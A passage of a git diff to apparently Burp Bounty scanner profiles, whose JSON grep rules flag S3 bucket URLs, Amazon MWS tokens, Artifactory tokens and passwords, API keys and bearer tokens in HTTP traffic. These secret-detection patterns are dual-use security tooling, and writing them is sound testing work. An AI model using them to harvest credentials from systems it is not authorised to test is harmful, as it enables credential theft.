+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AccessToken",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Access Token Found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AmazonAWS.bb b/profiles/AmazonAWS.bb
new file mode 100755
index 0000000..4606212
--- /dev/null
+++ b/profiles/AmazonAWS.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "AmazonAWS",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,s3..*amazonaws.com"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AmazonAWS",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Amazon AWS found: \u003cbr\u003e\u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AmazonAWSRequest.bb b/profiles/AmazonAWSRequest.bb
index 09b5868..1deb56e 100755
--- a/profiles/AmazonAWSRequest.bb
+++ b/profiles/AmazonAWSRequest.bb
@@ -1 +1,59 @@
-[{"Name":"AmazonAWSRequest","Enabled":true,"Scanner":3,"Author":"@egarme","UrlEncode":false,"Grep":["true,Or,All Request,Name,s3..*amazonaws.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"NegativeCT":false,"IsResponseCode":false,"NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AmazonAWS","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Amazon AWS found: \u003cbr\u003e\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "AmazonAWSRequest",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Name,s3..*amazonaws.com"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AmazonAWS",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Amazon AWS found: \u003cbr\u003e\u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Amazon_AWS_S3_Url.bb b/profiles/Amazon_AWS_S3_Url.bb
old mode 100644
new mode 100755
index 45cf44d..5d9ab38
--- a/profiles/Amazon_AWS_S3_Url.bb
+++ b/profiles/Amazon_AWS_S3_Url.bb
@@ -1 +1,64 @@
-[{"Name":"Amazon_AWS_S3_Url","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[a-zA-Z0-9-\\.\\_]+\\.s3\\.amazonaws\\.com","true,Or,s3:\\/\\/[a-zA-Z0-9-\\.\\_]+","true,Or,s3.amazonaws.com\\/[a-zA-Z0-9-\\.\\_]+","true,Or,s3.console.aws.amazon.com\\/s3\\/buckets\\/[a-zA-Z0-9-\\.\\_]+","true,Or,s3\\\\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\\\\.s3\\\\.amazonaws.com"],"Tags":["Cloud","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Url Detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Amazon_AWS_S3_Url",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,[a-zA-Z0-9-\\.\\_]+\\.s3\\.amazonaws\\.com",
+ "true,Or,s3:\\/\\/[a-zA-Z0-9-\\.\\_]+",
+ "true,Or,s3.amazonaws.com\\/[a-zA-Z0-9-\\.\\_]+",
+ "true,Or,s3.console.aws.amazon.com\\/s3\\/buckets\\/[a-zA-Z0-9-\\.\\_]+",
+ "true,Or,s3\\\\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\\\\.s3\\\\.amazonaws.com"
+ ],
+ "Tags": [
+ "Cloud",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AWS Url Detected",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Amazon_MWS_Auth_Token.bb b/profiles/Amazon_MWS_Auth_Token.bb
old mode 100644
new mode 100755
index be9f675..479a34f
--- a/profiles/Amazon_MWS_Auth_Token.bb
+++ b/profiles/Amazon_MWS_Auth_Token.bb
@@ -1 +1,59 @@
-[{"Name":"Amazon_MWS_Auth_Token","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,amzn\\\\.mws\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Amazon MWS url found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Amazon MWS url found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Amazon_MWS_Auth_Token",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,amzn\\\\.mws\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Amazon MWS url found",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Amazon MWS url found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Android_WebView_JS.bb b/profiles/Android_WebView_JS.bb
old mode 100644
new mode 100755
index 634ecc9..631b25e
--- a/profiles/Android_WebView_JS.bb
+++ b/profiles/Android_WebView_JS.bb
@@ -1 +1,60 @@
-[{"Name":"Android_WebView_JS","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,setJavaScriptEnabled\\(true\\)"],"Tags":["All","Mobile"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Possible Android Webview JS enabled","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Possible Android Webview JS enabled","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Android_WebView_JS",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,setJavaScriptEnabled\\(true\\)"
+ ],
+ "Tags": [
+ "All",
+ "Mobile"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Possible Android Webview JS enabled",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Possible Android Webview JS enabled",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/ApiKeyRequest.bb b/profiles/ApiKeyRequest.bb
old mode 100644
new mode 100755
index a50a706..651c246
--- a/profiles/ApiKeyRequest.bb
+++ b/profiles/ApiKeyRequest.bb
@@ -1 +1,63 @@
-[{"Name":"ApiKeyRequest","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["api_key","api-key","api key","apikey"],"Tags":["API"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ApiKeyRequest","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Api Key found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "ApiKeyRequest",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,api_key",
+ "true,Or,All Request,Value,api-key",
+ "true,Or,All Request,Value,api key",
+ "true,Or,All Request,Value,apikey"
+ ],
+ "Tags": [
+ "API",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "ApiKeyRequest",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Api Key found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/ApiKeyResponse.bb b/profiles/ApiKeyResponse.bb
new file mode 100755
index 0000000..05b60b0
--- /dev/null
+++ b/profiles/ApiKeyResponse.bb
@@ -0,0 +1,62 @@
+[
+ {
+ "ProfileName": "ApiKeyResponse",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,api_key",
+ "true,Or,api-key",
+ "true,Or,api key",
+ "true,Or,apikey"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "ApiKeyResponse",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Api Key found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/ApiPath.bb b/profiles/ApiPath.bb
old mode 100644
new mode 100755
index e8b2d9b..6e98055
--- a/profiles/ApiPath.bb
+++ b/profiles/ApiPath.bb
@@ -1 +1,61 @@
-[{"Name":"ApiPath","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["/api/","internal_api"],"Tags":["API"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ApiPath","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Api Path found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "ApiPath",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,/api/",
+ "true,Or,All Request,Value,/internal_api"
+ ],
+ "Tags": [
+ "API",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "ApiPath",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Api Path found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Artifactory_API_Token.bb b/profiles/Artifactory_API_Token.bb
old mode 100644
new mode 100755
index 88fbcf8..44615a5
--- a/profiles/Artifactory_API_Token.bb
+++ b/profiles/Artifactory_API_Token.bb
@@ -1 +1,59 @@
-[{"Name":"Artifactory_API_Token","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?:\\s|\u003d|:|\"|^)AKC[a-zA-Z0-9]{10,}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Artifactory API Token","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Artifactory_API_Token",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?:\\s|\u003d|:|\"|^)AKC[a-zA-Z0-9]{10,}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Artifactory API Token",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Artifactory_Password.bb b/profiles/Artifactory_Password.bb
old mode 100644
new mode 100755
index 3c18843..75e8f29
--- a/profiles/Artifactory_Password.bb
+++ b/profiles/Artifactory_Password.bb
@@ -1 +1,59 @@
-[{"Name":"Artifactory_Password","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?:\\s|\u003d|:|\"|^)AP[\\dABCDEF][a-zA-Z0-9]{8,}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Artifactory Password","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Artifactory_Password",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?:\\s|\u003d|:|\"|^)AP[\\dABCDEF][a-zA-Z0-9]{8,}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Artifactory Password",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/AuthorizationBearerToken.bb b/profiles/AuthorizationBearerToken.bb
old mode 100644
new mode 100755
index 6a13cf7..d95e466
--- a/profiles/AuthorizationBearerToken.bb
+++ b/profiles/AuthorizationBearerToken.bb
@@ -1 +1,60 @@
-[{"Name":"AuthorizationBearerToken","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Authorization: Bearer"],"Tags":["JWT"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"AuthorizationBearerToken","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Authorization Bearer Token Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "AuthorizationBearerToken",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,Authorization: Bearer"
+ ],
+ "Tags": [
+ "JWT",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
